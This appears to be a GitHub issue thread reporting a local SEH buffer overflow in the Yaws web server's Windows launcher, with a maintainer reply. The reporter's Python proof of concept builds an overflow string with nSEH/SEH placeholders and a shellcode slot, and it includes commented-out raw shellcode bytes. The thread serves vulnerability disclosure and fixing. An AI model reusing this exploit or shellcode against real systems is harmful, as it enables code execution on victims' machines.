Windows SEH Buffer overflow

[mvmendes]

https://github.com/klacke/yaws/blob/493ecfe60d722be506bc3ee8a9b12c69bf1e3580/win32/yaws.c#L211 This line opens a local vulnerability that could be exploited by SEH Buffer Overflow technique. I exploited it, in this POC: (python)

import binascii
from subprocess import call
junk = 'A'*201 
nops='\x90'*2 
nseh = 'BBBB'#jmp \xEB \x02  
seh = 'CCCC' #pop,pop,ret
#cmd =  "\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x06\x8B\x68\x08\x68\x11\x11\x11\x11\x66\x68\x11\x11\x5B\x53\x55\x5B\x66\x81\xC3\x4B\x85\xFF\xD3\xEB\xEA" 
#cmd =  '\x31\xc0\x50\x68\x42\x34\x6d\x7c\x68\x7c\x42\x33\x6d\x89\xe1\xbb\xd4\x29\x86\x7c\x51\x50\xff\xd3'#'\x8b\xec\x68\x65\x78\x65'+'\x20\x68\x63\x6d\x64\x2e'+'\x8d\x45\xf8\x50\xb8\x8D'+'\x15\x86\x7C\xff\xd0'
cmd = ('\x90'*41) + 'Z' #SHELLCODE WITH 42 BYTES OF MAX LENGTH (more than it, the buffer will rolling the byte array)                       
print (len(cmd))
buf = junk + nseh + seh+ nops+ cmd 

buf = buf + ('E'* (253 - len(buf))) +'XXXX'  #EDX overflowed to 58585858 (XXXX) on 254-257 position 
buf = buf + ('E'* (510 - len(buf)))  
print ('>yaws.exe --erlarg ' + (buf))  
print(len(buf))
#need to have unless 510 chars in order to overflow the buffer
call(["c:\\Yaws-2.0.4\\bin\\yaws.exe", "--erlarg", buf  ])

EDX also overflowed to XXXX .

[vinoski]

Thanks! Turns out there are quite a few similar issues in this file, where calls to sprintf or strcat could overflow buffers. I'm working on fixing them. One issue I will run into, though, is that I personally don't have a platform on which I can build and verify the changes. If anyone would be willing to help in that department, please let me know.